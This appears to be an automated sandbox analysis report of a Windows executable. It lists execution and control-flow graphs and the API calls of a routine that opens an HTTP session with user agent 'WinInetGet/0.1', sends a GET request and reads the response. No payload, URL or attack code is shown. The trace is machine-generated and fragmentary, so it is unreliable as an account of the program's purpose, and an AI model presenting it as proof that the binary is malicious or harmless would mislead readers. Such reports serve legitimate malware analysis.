                                                                                                                                                                                                    execution_graph 89399 397aaa 89414 397d20 89399->89414 89401 397ab6 __crtGetShowWindowMode 89402 397ada 89401->89402 89403 397afc _amsg_exit 89402->89403 89404 397b06 89402->89404 89405 397b3b 89403->89405 89404->89405 89406 397b0f _initterm_e 89404->89406 89407 397b49 _initterm 89405->89407 89409 397b64 __IsNonwritableInCurrentImage 89405->89409 89406->89405 89408 397b2a __onexit 89406->89408 89407->89409 89411 397be7 exit 89409->89411 89412 397c36 89409->89412 89415 375f90 ??0AtExitManager@base@@QAE ?Init@CommandLine@@SA_NHPBQBD 89409->89415 89411->89409 89412->89408 89413 397c3f _cexit 89412->89413 89413->89408 89414->89401 89472 380320 ?RegisterProvider@PathService@@SAXP6A_NHPAVFilePath@base@@@ZHH 89415->89472 89417 375fcd ??0FilePath@base@@QAE 89473 375d70 30 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 89417->89473 89419 375fdf 89474 375100 14 API calls 89419->89474 89421 376001 ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ 89422 376023 ??0LoggingSettings@logging@@QAE ?BaseInitLoggingImpl_built_with_NDEBUG@logging@@YA_NABULoggingSettings@1@ ?SetLogItems@logging@@YAX_N000 ?GetMinLogLevel@logging@ 89421->89422 89423 376018 ??3@YAXPAX 89421->89423 89424 376075 ??0LogMessage@logging@@QAE@PBDHH 89422->89424 89425 3760b5 89422->89425 89423->89422 89475 3718e0 24 API calls 89424->89475 89427 3760c3 ??1LogMessage@logging@@QAE 89425->89427 89428 3760ce ??0FilePath@base@@QAE ?Get@PathService@@SA_NHPAVFilePath@base@@ 89425->89428 89427->89428 89430 376135 89428->89430 89431 3760ed ?GetMinLogLevel@logging@ 89428->89431 89429 3760a2 ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W 89476 3718e0 24 API calls 89429->89476 89478 375ec0 83 API calls 89430->89478 89434 3760f4 89431->89434 89445 37611b 89431->89445 89477 3718e0 24 API calls 89434->89477 89435 376123 ??1LogMessage@logging@@QAE 89436 37612b 89435->89436 89438 376228 ??1FilePath@base@@QAE ??1FilePath@base@@QAE ??1FilePath@base@@QAE ??1AtExitManager@base@@QAE 89436->89438 89437 37613a 89479 37aec0 68 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 89437->89479 89490 397604 6 API calls ___raise_securityfailure 89438->89490 89440 376141 89480 38a4b0 ??0LockImpl@internal@base@@QAE 89440->89480 89443 376258 89443->89409 89445->89435 89445->89436 89446 37614c 89481 38ae00 199 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 89446->89481 89448 37615f 89449 376163 89448->89449 89450 376179 ?GetMinLogLevel@logging@ 89448->89450 89482 375ec0 83 API calls 89449->89482 89451 376180 89450->89451 89452 3761a7 89450->89452 89484 3718e0 24 API calls 89451->89484 89454 3761af ??1LogMessage@logging@@QAE 89452->89454 89455 3761ba 89452->89455 89454->89455 89485 38ccc0 39 API calls 89455->89485 89456 376168 89483 37c890 681 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 89456->89483 89459 37616f 89489 38a6c0 36 API calls 89459->89489 89461 3761c5 89486 375ec0 83 API calls 89461->89486 89464 3761cc 89487 37c890 681 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 89464->89487 89466 3761d3 ?GetMinLogLevel@logging@ 89467 376210 89466->89467 89468 3761de ??0LogMessage@logging@@QAE@PBDHH 89466->89468 89467->89459 89470 376215 ??1LogMessage@logging@@QAE 89467->89470 89488 3718e0 24 API calls 89468->89488 89470->89459 89471 376205 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J 89471->89467 89472->89417 89473->89419 89474->89421 89475->89429 89476->89425 89477->89445 89478->89437 89479->89440 89480->89446 89481->89448 89482->89456 89483->89459 89484->89452 89485->89461 89486->89464 89487->89466 89488->89471 89489->89438 89490->89443

                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                    Function 00373040 Relevance: 274.2, APIs: 137, Strings: 19, Instructions: 1171threadnetworkfileCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 42 373040-37309d call 397850 45 3730a3 42->45 46 37309f-3730a1 42->46 47 3730a5-373242 ?SysNativeMBToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ GetCurrentThreadId GetTickCount call 3718e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 * 3 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z call 3718e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z * 2 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z call 375c50 45->47 46->47 62 373246-373256 OutputDebugStringA 47->62 63 373244 47->63 64 373266-37333f call 374db0 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ call 3729a0 call 375100 call 372110 InternetOpenW 62->64 65 373258-373263 ??3@YAXPAX@Z 62->65 63->62 74 373341-37336a ??0exception@std@@QAE@ABQBD@Z _CxxThrowException 64->74 75 37336f-3734d3 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ call 3718e0 GetTickCount ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 * 3 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z call 3718e0 GetCurrentThreadId ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z call 375c50 64->75 65->64 74->75 90 3734d7-3734e1 OutputDebugStringA 75->90 91 3734d5 75->91 92 3734e3-3734ee ??3@YAXPAX@Z 90->92 93 3734f1-373582 call 374db0 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ call 372c50 90->93 91->90 92->93 98 373584-3735ad ??0exception@std@@QAE@ABQBD@Z _CxxThrowException 93->98 99 3735b2-373717 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ call 3718e0 GetTickCount ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 * 3 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z call 3718e0 GetCurrentThreadId ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z call 375c50 93->99 98->99 114 37371b-373725 OutputDebugStringA 99->114 115 373719 99->115 116 373727-373732 ??3@YAXPAX@Z 114->116 117 373735-373789 call 3728a0 HttpOpenRequestW 114->117 115->114 116->117 120 37378b-3737b4 ??0exception@std@@QAE@ABQBD@Z _CxxThrowException 117->120 121 3737b9-37391e ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ call 3718e0 GetTickCount ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 * 3 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z call 3718e0 GetCurrentThreadId ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z call 375c50 117->121 120->121 136 373922-37392c OutputDebugStringA 121->136 137 373920 121->137 138 37392e-373939 ??3@YAXPAX@Z 136->138 139 37393c-373979 call 3728a0 lstrlenW HttpAddRequestHeadersW 136->139 137->136 138->139 142 37397b-3739a4 ??0exception@std@@QAE@ABQBD@Z _CxxThrowException 139->142 143 3739a9-3739c7 HttpSendRequestW 139->143 142->143 144 3739cd-373aab GetLastError ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ call 3718e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 375c50 143->144 145 373ad9-373c3e ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ call 3718e0 GetTickCount ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 * 3 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z call 3718e0 GetCurrentThreadId ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z call 375c50 143->145 154 373aaf-373ad4 ??0exception@std@@QAE@ABQBD@Z _CxxThrowException 144->154 155 373aad 144->155 166 373c42-373dca OutputDebugStringA call 371100 call 3728a0 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ call 3718e0 GetTickCount ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 * 3 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z call 3718e0 GetCurrentThreadId ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z call 375c50 145->166 167 373c40 145->167 154->145 155->154 186 373dce-373e38 OutputDebugStringA call 371100 call 3728a0 call 372f00 call 372760 call 371100 166->186 187 373dcc 166->187 167->166 198 374102-3742e9 ??0exception@std@@QAE@ABQBD@Z _CxxThrowException call 3727a0 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ call 371d70 ?SysNativeMBToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z GetCurrentThreadId GetTickCount call 3718e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 * 3 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z call 3718e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z call 372830 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z call 3723e0 call 375c50 186->198 199 373e3e-373e9e atoi call 375230 call 372f00 call 372760 call 371100 186->199 187->186 251 3742ed-37430f OutputDebugStringA call 371100 call 3728a0 198->251 252 3742eb 198->252 216 3740d4-3740fd ??0exception@std@@QAE@ABQBD@Z _CxxThrowException 199->216 217 373ea4-373eaf 199->217 216->198 219 373eb1-373eb6 call 3713e0 217->219 220 373ebb-373f09 call 375230 call 3710a0 call 372cc0 call 371100 217->220 219->220 238 373f0b-373f25 atoi 220->238 239 373f28-373f5a call 372f00 call 372760 call 371100 220->239 238->239 255 373f84-373f88 239->255 256 373f5c-373f7f atoi call 375230 239->256 270 374316-374481 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ GetCurrentThreadId GetTickCount call 3718e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 * 3 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z call 3718e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z call 375c50 251->270 252->251 258 374017-37403b call 371100 * 2 255->258 259 373f8e-373f9b 255->259 256->255 258->270 261 373fa0-373fe6 InternetReadFile 259->261 264 373ff2-374012 call 377730 call 375720 261->264 265 373fe8-373ff0 261->265 264->258 265->264 268 374040-374045 265->268 275 3740cf call 397768 268->275 276 37404b-3740ca printf call 375200 memcpy call 371b30 call 377730 268->276 298 374485-3744e8 OutputDebugStringA call 371100 call 3728a0 call 372690 call 3723e0 * 2 call 371100 call 397604 270->298 299 374483 270->299 275->216 276->261 299->298
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?SysNativeMBToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z.BASE(?,?), ref: 003730C2
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 003730E9
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037310C
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00373146
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00373178
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00373198
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 003731B5
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 003731D8
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 003731E9
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000), ref: 003731FF
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000,?,Function_00001D40), ref: 0037321F
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 00373226
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037324D
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037325E
                                                                                                                                                                                                      • Part of subcall function 00374DB0: ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120(?,00372082), ref: 00374DB9
                                                                                                                                                                                                      • Part of subcall function 00374DB0: ??3@YAXPAX@Z.MSVCR120(00375490,?,00372082), ref: 00374DC4
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 003732AC
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 003732B8
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 003732C4
                                                                                                                                                                                                      • Part of subcall function 003729A0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 003729ED
                                                                                                                                                                                                      • Part of subcall function 003729A0: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00372A10
                                                                                                                                                                                                      • Part of subcall function 003729A0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00372A4A
                                                                                                                                                                                                      • Part of subcall function 003729A0: GetCurrentThreadId.KERNEL32 ref: 00372A84
                                                                                                                                                                                                      • Part of subcall function 003729A0: GetTickCount.KERNEL32 ref: 00372AA4
                                                                                                                                                                                                      • Part of subcall function 003729A0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00372AC1
                                                                                                                                                                                                      • Part of subcall function 003729A0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 00372AE4
                                                                                                                                                                                                      • Part of subcall function 003729A0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00372AF5
                                                                                                                                                                                                      • Part of subcall function 003729A0: ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000), ref: 00372B05
                                                                                                                                                                                                      • Part of subcall function 003729A0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 00372B10
                                                                                                                                                                                                      • Part of subcall function 003729A0: OutputDebugStringA.KERNEL32(00000000,?), ref: 00372B2E
                                                                                                                                                                                                      • Part of subcall function 003729A0: ??3@YAXPAX@Z.MSVCR120(?), ref: 00372B3D
                                                                                                                                                                                                      • Part of subcall function 00372110: memset.MSVCR120 ref: 00372182
                                                                                                                                                                                                      • Part of subcall function 00372110: memset.MSVCR120 ref: 0037219F
                                                                                                                                                                                                      • Part of subcall function 00372110: memset.MSVCR120 ref: 003721C8
                                                                                                                                                                                                      • Part of subcall function 00372110: memset.MSVCR120 ref: 003721F1
                                                                                                                                                                                                      • Part of subcall function 00372110: InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0037221B
                                                                                                                                                                                                      • Part of subcall function 00372110: printf.MSVCR120 ref: 0037222A
                                                                                                                                                                                                    • InternetOpenW.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000), ref: 00373335
                                                                                                                                                                                                    • ??0exception@std@@QAE@ABQBD@Z.MSVCR120(?), ref: 00373358
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,003A3D38), ref: 0037336A
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00373389
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 003733AC
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 003733E6
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00373424
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 0037342D
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(000000BC), ref: 00373464
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037347A
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 00373483
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000,OpenSession m_hSession = ), ref: 0037349D
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z.MSVCP120 ref: 003734AA
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(Function_00001D40), ref: 003734B7
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 003734D8
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 003734E9
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00373537
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00373543
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037354F
                                                                                                                                                                                                      • Part of subcall function 00372C50: InternetConnectW.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00372C77
                                                                                                                                                                                                      • Part of subcall function 00372C50: InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 00372C99
                                                                                                                                                                                                      • Part of subcall function 00372C50: InternetSetOptionW.WININET(00000000,00000006,00057E40,00000004), ref: 00372CA8
                                                                                                                                                                                                    • ??0exception@std@@QAE@ABQBD@Z.MSVCR120(?), ref: 0037359B
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,003A3D38), ref: 003735AD
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 003735CC
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 003735EF
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00373629
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00373667
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 00373670
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(000000C2), ref: 003736A7
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003736BD
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 003736C6
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000,Connect m_hConnect = ), ref: 003736E0
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z.MSVCP120(00000010), ref: 003736EE
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(Function_00001D40), ref: 003736FB
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037371C
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037372D
                                                                                                                                                                                                    • HttpOpenRequestW.WININET(00000008,GET,?,00000000,00000000,00000000,844C8200), ref: 0037377E
                                                                                                                                                                                                    • ??0exception@std@@QAE@ABQBD@Z.MSVCR120(?), ref: 003737A2
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,003A3D38), ref: 003737B4
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 003737D3
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 003737F6
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00373830
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037386E
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 00373877
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(000000C8), ref: 003738AE
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003738C4
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 003738CD
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000,OpenRequest m_hRequest = ), ref: 003738E7
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z.MSVCP120(?), ref: 003738F5
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(Function_00001D40), ref: 00373902
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 00373923
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00373934
                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00373963
                                                                                                                                                                                                    • HttpAddRequestHeadersW.WININET(?,?,00000000,20000000), ref: 00373971
                                                                                                                                                                                                    • ??0exception@std@@QAE@ABQBD@Z.MSVCR120(?), ref: 00373992
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,003A3D38), ref: 003739A4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
